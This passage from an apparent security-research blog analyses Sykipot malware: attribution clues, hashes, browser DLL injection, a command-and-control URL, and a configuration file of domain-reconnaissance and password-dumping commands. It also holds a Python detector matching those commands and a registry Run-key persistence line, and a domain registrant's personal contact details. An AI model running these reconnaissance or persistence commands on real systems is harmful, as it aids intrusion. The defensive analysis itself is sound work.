Apart from this, the “Netbox” (http://www.netbox.cn) webserver used in the C&C servers is mainly used by those who speak Chinese. In fact all the documentation to setup and learn the framework is only available in Mandarin.

Most of the domains used in these campaigns are registered at Xinnet, a Chinese domain registrar. Also, the information on the domain owners (names, addresses, etc.) is from China (not very relevant).

Finally, we related one of the tools used that redirects the traffic from the hacked servers to a tool called ZXPortMap:

http://read.pudn.com/downloads64/sourcecode/internet/proxy/225114/ZXPortMap.cpp__.htm

The origin of the tool seems to be from China, someone called LZX (lzx@qq.com) but anyone could have gotten the code, and compiled it.

The last piece of information is a string embedded in all of the Sykipot binaries, "19990817", used for another layer of encryption. It may be the date "Aug 17, 1999". The only relevant event on that date was a 7.6 magnitude earthquake that killed around 17000 people in Turkey (http://en.wikipedia.org/wiki/1999_%C4%B0zmit_earthquake).

Has someone said that cyberwar does not exist? Draw your own conclusions.


Another Sykipot sample likely targeting US federal agencies

December 12th, 2011 | Posted by jaime.blasco in Attacks | Blog | Exploits | Malware - (Comments Off)

Last week Adobe issued an advisory on a zero-day vulnerability (CVE-2011-2462) that has been used in targeted attacks, probably against defense contractors.

The payload used is Sykipot, a known malware that has been connected with several targeted attacks and 0-days in the past.

During the analysis of this attack, I’ve found a new sample with a fresh command and control server (C&C).

MD5: 4d979bb626e1e61cc4fc0cefefaa3ec7

VirusTotal submission date: 2011-12-12 00:39:51 (UTC)

VirusTotal result: 25/43 (58.1%)

The binary drops a DLL:

FileName: WSE4EF1.TMP

MD5: 945FF23E9979A0867B7F3815BB0F9477

Timestamp: 22/11/2011

Original File Name: wship4.dll (IPv4 Helper DLL)

The original malware scans the list of running processes looking for outlook, iexplore or firefox. If one is found, it injects the DLL into that process.

 

After that, the binary will open a PDF file:

FY 2012 Per Diem Rates – Effective October 1, 2011

 

This file shows the continental United States “CONUS rates” for travelling expenses.

The injected DLL will contact XXXhksrv.hostdefence.net/asp/kys_allow_get.asp?name=getkys.kys to download an encrypted configuration file. This file contains several commands that the victim machine will execute, sending the results back to the C&C server.

Example of configuration file:

iexplore
findpass2000
process
ipconfig /all
netstat -ano
net start
net view /domain
net group "domain admins" /domain
tasklist /v
net localgroup administrators
dir c:\*.url /s
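This configuration file and the one from the "drone" campaign above are short reconnaissance sequences (domain admin enumeration, local administrators, netstat, tasklist, a search for .url files), and the persistence command from the first post (reg add ... \CurrentVersion\Run /v start ... -startup) is just as distinctive. The following Python script is an added example, not code from the post: it scans constructed process-creation log lines and alerts when one host runs several of these indicators within a short window. The log format, host names, timestamps and the payload file name are all constructed; the command patterns are the ones quoted on this page.

```python
"""Flag the Sykipot reconnaissance burst in process-creation logs (added example).

Indicators are the commands listed in the two configuration files on the page
plus the Run-key persistence command. Log format and sample lines are constructed.
"""
import re
from collections import defaultdict
from datetime import datetime, timedelta
from typing import Dict, List

INDICATORS = {
    "findpass2000": re.compile(r"\bfindpass2000\b", re.I),
    "ipconfig_all": re.compile(r"\bipconfig(\.exe)?\s+/all\b", re.I),
    "netstat_ano": re.compile(r"\bnetstat(\.exe)?\s+-ano\b", re.I),
    "net_start": re.compile(r"\bnet(\.exe)?\s+start\b", re.I),
    "net_view_domain": re.compile(r"\bnet(\.exe)?\s+view\s+/domain\b", re.I),
    "domain_admins": re.compile(r'\bnet(\.exe)?\s+group\s+"?domain admins"?\s+/domain\b', re.I),
    "tasklist_v": re.compile(r"\btasklist(\.exe)?\s+/v\b", re.I),
    "local_admins": re.compile(r"\bnet(\.exe)?\s+localgroup\s+administrators\b", re.I),
    "url_search": re.compile(r"\bdir\s+c:\\\*\.url\s+/s\b", re.I),
    "systeminfo": re.compile(r"\bsysteminfo\b", re.I),
    "boot_ini": re.compile(r"\btype\s+c:\\boot\.ini\b", re.I),
    "run_key_startup": re.compile(
        r"\breg(\.exe)?\s+add\s+HKCU\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run\b.*-startup", re.I),
}

WINDOW = timedelta(minutes=5)   # distinct indicators counted within this span
THRESHOLD = 4                   # alert when a host reaches this many

# Constructed sample log: "<ISO timestamp> <host> <parent image> <command line>"
# (payload.exe stands in for the dropped Sykipot executable)
SAMPLE_LOG = r"""
2013-03-20T09:00:01 WS01 iexplore.exe cmd /c ipconfig /all
2013-03-20T09:00:02 WS01 iexplore.exe cmd /c net start
2013-03-20T09:00:02 WS01 iexplore.exe cmd /c net view /domain
2013-03-20T09:00:03 WS01 iexplore.exe cmd /c net group "domain admins" /domain
2013-03-20T09:00:04 WS01 iexplore.exe cmd /c tasklist /v
2013-03-20T09:00:04 WS01 iexplore.exe cmd /c net localgroup administrators
2013-03-20T09:00:05 WS01 iexplore.exe cmd /c dir c:\*.url /s
2013-03-20T09:00:09 WS01 iexplore.exe cmd /c reg add HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v start /t REG_SZ /d C:\DOCUME~1\ADMINI~1\LOCALS~1\payload.exe -startup /f
2013-03-20T09:15:00 WS02 explorer.exe cmd.exe /c ipconfig /all
2013-03-20T11:30:00 WS02 explorer.exe tasklist
2013-03-20T11:31:00 WS02 explorer.exe net start
"""


def parse_line(line: str):
    """Split one log line into (timestamp, host, parent, command line)."""
    ts, host, parent, cmd = line.split(" ", 3)
    return datetime.fromisoformat(ts), host, parent, cmd


def match_indicators(cmd: str) -> List[str]:
    """Names of every indicator pattern the command line matches."""
    return [name for name, rx in INDICATORS.items() if rx.search(cmd)]


def detect(log_text: str) -> Dict[str, List[str]]:
    """Return {host: sorted distinct indicators} for hosts that reach THRESHOLD
    distinct indicators inside any WINDOW-long span."""
    events = defaultdict(list)  # host -> [(timestamp, indicator)]
    for line in log_text.splitlines():
        if not line.strip():
            continue
        ts, host, _parent, cmd = parse_line(line)
        for name in match_indicators(cmd):
            events[host].append((ts, name))

    alerts: Dict[str, List[str]] = {}
    for host, evs in events.items():
        evs.sort()
        for i, (t0, _) in enumerate(evs):
            seen = {name for t, name in evs[i:] if t - t0 <= WINDOW}
            if len(seen) >= THRESHOLD:
                alerts[host] = sorted(seen)
                break
    return alerts


if __name__ == "__main__":
    for host, names in detect(SAMPLE_LOG).items():
        print(f"{host}: {len(names)} recon indicators -> {', '.join(names)}")
```

Counting distinct indicators rather than raw matches keeps an administrator who runs ipconfig /all twice from tripping the rule, while the window bounds the comparison to the few seconds in which the implant works through its command list.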

The domain info is:

Domain Name: hostdefence.net
Registrant: Amirhosein Amirhosein (parviz7415@yahoo.com)
Address: No 806 8th building YuLin City GuangXi Province, Yu Lin, Guang Xi, 537500, CN
Tel. +86.7756853792
Creation Date: 2011-11-14 15:35:24
Expiration Date: 2012-11-14 15:35:24
